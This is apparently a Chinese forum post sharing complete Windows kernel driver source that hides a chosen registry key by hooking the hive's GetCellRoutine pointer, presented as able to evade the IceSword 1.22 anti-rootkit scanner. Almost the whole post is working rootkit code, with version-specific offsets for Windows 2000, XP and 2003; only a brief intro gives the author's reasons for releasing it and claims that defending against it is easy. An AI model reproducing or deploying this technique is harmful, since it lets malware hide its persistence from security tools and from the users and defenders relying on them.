发一段隐藏注册表项的驱动代码,可以过目前最新的IceSword1.22。
以前驱动开发网悬赏挑战IceSword时写的,不过最后没公开。那时流氓软件势头正劲,我可不想火上浇油。现在反流氓软件日渐成熟,也就没关系了。知道了原理,防御是非常容易的。
原理很简单,实现的代码也很短,啥都不用说,各位直接看示例代码吧。
#include <ntddk.h>
#define GET_PTR(ptr, offset) ( *(PVOID*)( (ULONG)ptr + (offset##Offset) ) )
#define CM_KEY_INDEX_ROOT 0x6972 // ir #define CM_KEY_INDEX_LEAF 0x696c // il #define CM_KEY_FAST_LEAF 0x666c // fl #define CM_KEY_HASH_LEAF 0x686c // hl
// 一些CM的数据结构,只列出用到的开头部分 #pragma pack(1) typedef struct _CM_KEY_NODE { USHORT Signature; USHORT Flags; LARGE_INTEGER LastWriteTime; ULONG Spare; // used to be TitleIndex HANDLE Parent; ULONG SubKeyCounts[2]; // Stable and Volatile HANDLE SubKeyLists[2]; // Stable and Volatile // ... } CM_KEY_NODE, *PCM_KEY_NODE;
typedef struct _CM_KEY_INDEX { USHORT Signature; USHORT Count; HANDLE List[1]; } CM_KEY_INDEX, *PCM_KEY_INDEX;
typedef struct _CM_KEY_BODY { ULONG Type; // "ky02" PVOID KeyControlBlock; PVOID NotifyBlock; PEPROCESS Process; // the owner process LIST_ENTRY KeyBodyList; // key_nodes using the same kcb } CM_KEY_BODY, *PCM_KEY_BODY;
typedef PVOID (__stdcall *PGET_CELL_ROUTINE)(PVOID, HANDLE);
typedef struct _HHIVE { ULONG Signature; PGET_CELL_ROUTINE GetCellRoutine; // ... } HHIVE, *PHHIVE; #pragma pack()
// 需隐藏的主键名 WCHAR g_HideKeyName[] = L"\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Services\\Beep";
PGET_CELL_ROUTINE g_pGetCellRoutine = NULL; PGET_CELL_ROUTINE* g_ppGetCellRoutine = NULL;
PCM_KEY_NODE g_HideNode = NULL; PCM_KEY_NODE g_LastNode = NULL;
// 打开指定名字的Key HANDLE OpenKeyByName(PCWSTR pwcsKeyName) { NTSTATUS status; UNICODE_STRING uKeyName; OBJECT_ATTRIBUTES oa; HANDLE hKey;
RtlInitUnicodeString(&uKeyName, pwcsKeyName); InitializeObjectAttributes(&oa, &uKeyName, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL); status = ZwOpenKey(&hKey, KEY_READ, &oa); if (!NT_SUCCESS(status)) { DbgPrint("ZwOpenKey Failed: %lx\n", status); return NULL; }
return hKey; }
// 获取指定Key句柄的KeyControlBlock PVOID GetKeyControlBlock(HANDLE hKey) { NTSTATUS status; PCM_KEY_BODY KeyBody; PVOID KCB;
if (hKey == NULL) return NULL;
// 由Key句柄获取对象体 status = ObReferenceObjectByHandle(hKey, KEY_READ, NULL, KernelMode, &KeyBody, NULL); if (!NT_SUCCESS(status)) { DbgPrint("ObReferenceObjectByHandle Failed: %lx\n", status); return NULL; }
// 对象体中含有KeyControlBlock KCB = KeyBody->KeyControlBlock; DbgPrint("KeyControlBlock = %lx\n", KCB);
ObDereferenceObject(KeyBody);
return KCB; }
// 获取父键的最后一个子键的节点 PVOID GetLastKeyNode(PVOID Hive, PCM_KEY_NODE Node) { // 获取父键的节点 PCM_KEY_NODE ParentNode = (PCM_KEY_NODE)g_pGetCellRoutine(Hive, Node->Parent); // 获取子键的索引 PCM_KEY_INDEX Index = (PCM_KEY_INDEX)g_pGetCellRoutine(Hive, ParentNode->SubKeyLists[0]);
DbgPrint("ParentNode = %lx\nIndex = %lx\n", ParentNode, Index);
// 如果为根(二级)索引,获取最后一个索引 if (Index->Signature == CM_KEY_INDEX_ROOT) { Index = (PCM_KEY_INDEX)g_pGetCellRoutine(Hive, Index->List[Index->Count-1]); DbgPrint("Index = %lx\n", Index); }
if (Index->Signature == CM_KEY_FAST_LEAF || Index->Signature == CM_KEY_HASH_LEAF) { // 快速叶索引(2k)或散列叶索引(XP/2k3),返回最后的节点 return g_pGetCellRoutine(Hive, Index->List[2*(Index->Count-1)]); } else { // 一般叶索引,返回最后的节点 return g_pGetCellRoutine(Hive, Index->List[Index->Count-1]); } }
// GetCell例程的钩子函数 PVOID MyGetCellRoutine(PVOID Hive, HANDLE Cell) { // 调用原函数 PVOID pRet = g_pGetCellRoutine(Hive, Cell); if (pRet) { // 返回的是需要隐藏的节点 if (pRet == g_HideNode) { DbgPrint("GetCellRoutine(%lx, %08lx) = %lx\n", Hive, Cell, pRet); // 查询、保存并返回其父键的最后一个子键的节点 pRet = g_LastNode = (PCM_KEY_NODE)GetLastKeyNode(Hive, g_HideNode); DbgPrint("g_LastNode = %lx\n", g_LastNode); // 隐藏的正是最后一个节点,返回空值 if (pRet == g_HideNode) pRet = NULL; } // 返回的是先前保存的最后一个节点 else if (pRet == g_LastNode) { DbgPrint("GetCellRoutine(%lx, %08lx) = %lx\n", Hive, Cell, pRet); // 清空保存值,并返回空值 pRet = g_LastNode = NULL; } } return pRet; }
NTSTATUS DriverUnload(PDRIVER_OBJECT pDrvObj) { DbgPrint("DriverUnload()\n"); // 解除挂钩 if (g_ppGetCellRoutine) *g_ppGetCellRoutine = g_pGetCellRoutine; return STATUS_SUCCESS; }
NTSTATUS DriverEntry(PDRIVER_OBJECT pDrvObj, PUNICODE_STRING pRegPath) { ULONG BuildNumber; ULONG KeyHiveOffset; // KeyControlBlock->KeyHive ULONG KeyCellOffset; // KeyControlBlock->KeyCell HANDLE hKey; PVOID KCB, Hive;
DbgPrint("DriverEntry()\n");
pDrvObj->DriverUnload = DriverUnload;
// 查询BuildNumber if (PsGetVersion(NULL, NULL, &BuildNumber, NULL)) return STATUS_NOT_SUPPORTED; DbgPrint("BuildNumber = %d\n", BuildNumber);
// KeyControlBlock结构各版本略有不同 // Cell的值一般小于0x80000000,而Hive正相反,以此来判断也可以 switch (BuildNumber) { case 2195: // Win2000 KeyHiveOffset = 0xc; KeyCellOffset = 0x10; break; case 2600: // WinXP case 3790: // Win2003 KeyHiveOffset = 0x10; KeyCellOffset = 0x14; break; default: return STATUS_NOT_SUPPORTED; }
// 打开需隐藏的键 hKey = OpenKeyByName(g_HideKeyName); // 获取该键的KeyControlBlock KCB = GetKeyControlBlock(hKey); if (KCB) { // 由KCB得到Hive PHHIVE Hive = (PHHIVE)GET_PTR(KCB, KeyHive); // GetCellRoutine在KCB中,保存原地址 g_ppGetCellRoutine = &Hive->GetCellRoutine; g_pGetCellRoutine = Hive->GetCellRoutine; DbgPrint("GetCellRoutine = %lx\n", g_pGetCellRoutine); // 获取需隐藏的节点并保存 g_HideNode = (PCM_KEY_NODE)g_pGetCellRoutine(Hive, GET_PTR(KCB, KeyCell)); // 挂钩GetCell例程 Hive->GetCellRoutine = MyGetCellRoutine; } ZwClose(hKey);
return STATUS_SUCCESS; }
